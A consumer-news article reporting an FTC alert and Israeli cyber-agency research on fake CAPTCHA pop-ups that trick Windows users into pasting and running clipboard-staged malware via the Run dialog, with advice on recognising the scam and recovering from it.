The Federal Trade Commission published a consumer alert in June 2026 warning that fake CAPTCHA pop-ups are being used to trick people into running malware on their own computers. The scheme replaces the familiar “prove you’re human” verification box with a look-alike page that instructs visitors to press a specific sequence of keyboard shortcuts, quietly pasting and executing malicious code. The FTC’s advice is blunt: close the page immediately and do not follow any on-screen instructions.
How fake CAPTCHAs hijack the Windows Run dialog
The attack works by exploiting trust. Most internet users have clicked through a CAPTCHA dozens of times without thinking twice. These fake versions mimic that routine but add an unusual step. After the pop-up appears, on-screen text tells the user to press Windows+R, then Ctrl+V, then Enter. That three-keystroke sequence opens the Windows Run dialog, pastes a command already placed on the clipboard, and executes it, all in under two seconds. The FTC alert spells out these exact steps so readers can recognize the pattern before falling for it.
Behind the scenes, the malicious page uses a JavaScript clipboard function called navigator.clipboard.writeText to silently load the payload before the user presses anything. Israel’s National Cyber Directorate documented this mechanism in its research on a campaign it named ShadowCaptcha, which impersonates Cloudflare and Google CAPTCHA designs. The Israeli researchers identified two distinct execution flows: one through the Win+R Run dialog and another using .hta files processed by the Windows mshta utility. Both paths hand control of the machine to the attacker.
The clipboard write happens without a visible prompt on most default browser configurations. That gap between what the browser permits and what the user sees is the core vulnerability these campaigns exploit. Browsers that allow silent clipboard writes give attackers a free staging area for their commands. Comparing infection rates across browser versions that do and do not require explicit clipboard permission could reveal how much that single default setting contributes to the attack’s success, though no public telemetry dataset has yet tested that comparison.
FTC and Israeli researchers trace the same playbook
The FTC alert and the Israeli National Cyber Directorate research describe nearly identical mechanics from different vantage points. The FTC focuses on consumer protection, telling people what the scam looks like and what to do if they encounter it. The Israeli agency provides a technical breakdown of the JavaScript, the command payloads, and the delivery infrastructure. Together, the two documents confirm that the same tactic is active and that multiple governments consider it a serious threat.
The FTC also recommends specific recovery steps for anyone who may have already followed the fake instructions: disconnect the device from the internet and run security software right away. That guidance mirrors standard incident-response advice, but the agency’s decision to issue a standalone consumer alert signals that the volume or severity of reports reached a threshold worth public attention. The alert further encourages victims to report incidents directly to the FTC so investigators can track emerging patterns and coordinate with law enforcement.
Deceptive pop-ups are not a new concern for the commission. In October 2016, the FTC charged tech support companies with using deceptive pop-up ads to scare consumers into purchasing unneeded services. In that earlier campaign, victims were confronted with alarming full-screen warnings claiming their computers were infected, then steered to call centers staffed by bogus “technicians.” The new fake CAPTCHA scam swaps out the phone pitch for automated code execution, but the underlying strategy is the same: manufacture urgency, override skepticism, and push the user into doing the attacker’s work.
What consumers can do right now
Both the FTC and the Israeli researchers emphasize that user behavior remains a critical line of defense. Real CAPTCHAs never require opening the Windows Run dialog, copying and pasting system commands, or granting remote access. Any web page that instructs you to press Windows+R, type or paste a command, and hit Enter should be treated as hostile, even if it appears to be protecting a familiar site.
If you encounter such a prompt, the safest move is to close the browser tab or window immediately. Do not try to outsmart the page by experimenting with the commands or clicking additional buttons. If you already followed the instructions, disconnect from the internet, run a full system scan with reputable security software, and consider seeking professional help if anything suspicious is detected. For organizations, security teams can reduce exposure by tightening browser clipboard permissions, blocking known malicious domains, and educating employees about this specific social-engineering pattern.
The rise of fake CAPTCHA attacks underscores how quickly everyday interface elements can be repurposed against users. Verification boxes that once simply filtered out bots have become a convenient disguise for malware delivery. As attackers refine these tactics, staying safe will require a mix of browser-level safeguards, timely public warnings from agencies, and a healthy skepticism whenever a “security check” asks you to do something that looks more like system administration than simple verification.
David M. Keller is a finance writer based in Columbus, Ohio, covering personal finance and consumer-focused economic topics. He earned his degree in journalism from Ohio University and began his career reporting on local business and economic trends for a regional media outlet. Since then, he has contributed to a variety of online publications, focusing on clear, practical coverage of topics such as cost of living, debt, and everyday financial decision-making.
